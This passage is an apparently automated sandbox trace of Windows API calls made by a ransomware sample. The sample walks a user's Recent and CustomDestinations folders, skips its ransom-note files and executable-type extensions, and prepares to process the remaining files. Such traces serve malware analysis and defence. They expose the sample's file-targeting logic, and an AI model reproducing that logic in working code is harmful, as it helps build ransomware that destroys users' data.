lstrcmpiW (lpString1="bFIWOe.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.585] lstrcmpiW (lpString1="bFIWOe.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.585] PathFindExtensionW (pszPath="bFIWOe.flv.lnk") returned=".lnk" [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.585] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ec8d20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ec8d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ec8d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x2019, dwReserved0=0x0, dwReserved1=0x0, cFileName="bMwb4A9x4LoFtk.lnk", cAlternateFileName="BMWB4A~1.LNK")) returned 1 [0084.585] lstrcmpW (lpString1="bMwb4A9x4LoFtk.lnk", lpString2=".") returned 1 [0084.585] lstrcmpW (lpString1="bMwb4A9x4LoFtk.lnk", lpString2="..") returned 1 [0084.585] lstrcmpiW (lpString1="bMwb4A9x4LoFtk.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.585] lstrcmpiW (lpString1="bMwb4A9x4LoFtk.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.585] PathFindExtensionW (pszPath="bMwb4A9x4LoFtk.lnk") returned=".lnk" [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.585] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.586] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4569680, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4569680, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4569680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf41, dwReserved0=0x0, dwReserved1=0x0, cFileName="BUn59hNdG.lnk", cAlternateFileName="BUN59H~1.LNK")) returned 1 [0084.586] lstrcmpW (lpString1="BUn59hNdG.lnk", lpString2=".") returned 1 [0084.586] lstrcmpW (lpString1="BUn59hNdG.lnk", lpString2="..") returned 1 [0084.586] lstrcmpiW (lpString1="BUn59hNdG.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.586] lstrcmpiW (lpString1="BUn59hNdG.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.586] PathFindExtensionW (pszPath="BUn59hNdG.lnk") returned=".lnk" [0084.586] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.586] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.586] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.586] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e45480, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3e45480, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3e45480, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="BUqVl5CGakHhuG0QlpF.flv.lnk", cAlternateFileName="BUQVL5~1.LNK")) returned 1 [0084.586] lstrcmpW (lpString1="BUqVl5CGakHhuG0QlpF.flv.lnk", lpString2=".") returned 1 [0084.586] lstrcmpW (lpString1="BUqVl5CGakHhuG0QlpF.flv.lnk", lpString2="..") returned 1 [0084.586] lstrcmpiW (lpString1="BUqVl5CGakHhuG0QlpF.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.586] lstrcmpiW (lpString1="BUqVl5CGakHhuG0QlpF.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.586] PathFindExtensionW (pszPath="BUqVl5CGakHhuG0QlpF.flv.lnk") returned=".lnk" [0084.586] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.586] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.587] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe400e500, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe400e500, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe400e500, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa04, dwReserved0=0x0, dwReserved1=0x0, cFileName="BYRk6AyEZrNnrH.flv.lnk", cAlternateFileName="BYRK6A~1.LNK")) returned 1 [0084.587] lstrcmpW (lpString1="BYRk6AyEZrNnrH.flv.lnk", lpString2=".") returned 1 [0084.587] lstrcmpW (lpString1="BYRk6AyEZrNnrH.flv.lnk", lpString2="..") returned 1 [0084.587] lstrcmpiW (lpString1="BYRk6AyEZrNnrH.flv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.587] lstrcmpiW (lpString1="BYRk6AyEZrNnrH.flv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.587] PathFindExtensionW (pszPath="BYRk6AyEZrNnrH.flv.lnk") returned=".lnk" [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.587] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b97bc0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3b97bc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3b97bc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0x0, dwReserved1=0x0, cFileName="c1J1Vr7hWq.lnk", cAlternateFileName="C1J1VR~1.LNK")) returned 1 [0084.587] lstrcmpW (lpString1="c1J1Vr7hWq.lnk", lpString2=".") returned 1 [0084.587] lstrcmpW (lpString1="c1J1Vr7hWq.lnk", lpString2="..") returned 1 [0084.587] lstrcmpiW (lpString1="c1J1Vr7hWq.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.587] lstrcmpiW (lpString1="c1J1Vr7hWq.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.587] PathFindExtensionW (pszPath="c1J1Vr7hWq.lnk") returned=".lnk" [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.587] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.588] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c415c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4c415c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4c415c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="C8yKV.lnk", cAlternateFileName="")) returned 1 [0084.588] lstrcmpW (lpString1="C8yKV.lnk", lpString2=".") returned 1 [0084.588] lstrcmpW (lpString1="C8yKV.lnk", lpString2="..") returned 1 [0084.588] lstrcmpiW (lpString1="C8yKV.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.588] lstrcmpiW (lpString1="C8yKV.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.588] PathFindExtensionW (pszPath="C8yKV.lnk") returned=".lnk" [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.588] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42e1f20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe42e1f20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe42e1f20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cG9Y_mfr-.lnk", cAlternateFileName="CG9Y_M~1.LNK")) returned 1 [0084.588] lstrcmpW (lpString1="cG9Y_mfr-.lnk", lpString2=".") returned 1 [0084.588] lstrcmpW (lpString1="cG9Y_mfr-.lnk", lpString2="..") returned 1 [0084.588] lstrcmpiW (lpString1="cG9Y_mfr-.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.588] lstrcmpiW (lpString1="cG9Y_mfr-.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.588] PathFindExtensionW (pszPath="cG9Y_mfr-.lnk") returned=".lnk" [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.588] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.588] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0465da0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe0465da0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0465da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="CgDtuQ2FH3A.lnk", cAlternateFileName="CGDTUQ~1.LNK")) returned 1 [0084.588] lstrcmpW (lpString1="CgDtuQ2FH3A.lnk", lpString2=".") returned 1 [0084.589] lstrcmpW (lpString1="CgDtuQ2FH3A.lnk", lpString2="..") returned 1 [0084.589] lstrcmpiW (lpString1="CgDtuQ2FH3A.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.589] lstrcmpiW (lpString1="CgDtuQ2FH3A.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.589] PathFindExtensionW (pszPath="CgDtuQ2FH3A.lnk") returned=".lnk" [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.589] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2971400, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4f87400, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4f87400, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmsdJunDAp7WGacx.lnk", cAlternateFileName="CMSDJU~1.LNK")) returned 1 [0084.589] lstrcmpW (lpString1="cmsdJunDAp7WGacx.lnk", lpString2=".") returned 1 [0084.589] lstrcmpW (lpString1="cmsdJunDAp7WGacx.lnk", lpString2="..") returned 1 [0084.589] lstrcmpiW (lpString1="cmsdJunDAp7WGacx.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.589] lstrcmpiW (lpString1="cmsdJunDAp7WGacx.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.589] PathFindExtensionW (pszPath="cmsdJunDAp7WGacx.lnk") returned=".lnk" [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.589] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.589] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0084.589] lstrcmpW (lpString1="CustomDestinations", lpString2=".") returned 1 [0084.589] lstrcmpW (lpString1="CustomDestinations", lpString2="..") returned 1 [0084.590] lstrlenW (lpString="CustomDestinations") returned 18 [0084.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="CustomDestinations" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0084.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0084.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0084.590] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0084.592] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.592] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.592] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.592] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.592] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc975e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0084.592] lstrcmpW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".") returned 1 [0084.592] lstrcmpW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="..") returned 1 [0084.592] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.592] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.592] PathFindExtensionW (pszPath="1b4dd67f29cb1962.customDestinations-ms") returned=".customDestinations-ms" [0084.592] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.592] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.592] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.592] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.592] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.592] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.592] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781708 [0084.593] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.593] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22bfd60, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0xcbe116e0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xcbe116e0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="590aee7bdd69b59b.customDestinations-ms", cAlternateFileName="590AEE~1.CUS")) returned 1 [0084.593] lstrcmpW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2=".") returned 1 [0084.593] lstrcmpW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="..") returned 1 [0084.593] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.593] lstrcmpiW (lpString1="590aee7bdd69b59b.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.593] PathFindExtensionW (pszPath="590aee7bdd69b59b.customDestinations-ms") returned=".customDestinations-ms" [0084.593] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.593] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.593] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.593] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.593] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.593] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.593] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781820 [0084.593] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.593] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2da822a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2daa8400, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x43a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0084.594] lstrcmpW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".") returned 1 [0084.594] lstrcmpW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="..") returned 1 [0084.594] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.594] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.594] PathFindExtensionW (pszPath="5afe4de1b92fc382.customDestinations-ms") returned=".customDestinations-ms" [0084.594] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.594] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.594] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.594] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.594] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.594] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.594] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.594] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.594] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781938 [0084.594] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.594] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x96ec4eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x17d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5d696d521de238c3.customDestinations-ms", cAlternateFileName="5D696D~1.CUS")) returned 1 [0084.594] lstrcmpW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2=".") returned 1 [0084.594] lstrcmpW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="..") returned 1 [0084.594] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.595] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.595] PathFindExtensionW (pszPath="5d696d521de238c3.customDestinations-ms") returned=".customDestinations-ms" [0084.595] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.595] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.595] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.595] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.595] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.595] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.595] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781a50 [0084.595] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.595] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc975e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0084.595] lstrcmpW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".") returned 1 [0084.595] lstrcmpW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="..") returned 1 [0084.595] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.595] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.595] PathFindExtensionW (pszPath="7e4dca80246863e3.customDestinations-ms") returned=".customDestinations-ms" [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x7813b0 [0084.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7812e8 | out: hHeap=0x6d0000) returned 1 [0084.596] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x781b68 [0084.596] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813b0 | out: hHeap=0x6d0000) returned 1 [0084.596] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb126c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5ddd1400, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5ddd1400, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x23ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="be71009ff8bb02a2.customDestinations-ms", cAlternateFileName="BE7100~1.CUS")) returned 1 [0084.596] lstrcmpW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2=".") returned 1 [0084.596] lstrcmpW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="..") returned 1 [0084.596] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.596] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="Decryptor_Info.hta") returned -1 [0084.596] PathFindExtensionW (pszPath="be71009ff8bb02a2.customDestinations-ms") returned=".customDestinations-ms" [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".exe") returned -1 [0084.596] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".sys") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".lnk") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".dll") returned -1 [0084.597] lstrcmpiW (lpString1=".customDestinations-ms", lpString2=".msi") returned -1 [0084.597] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7812e8 [0084.597] RtlAllocateHeap 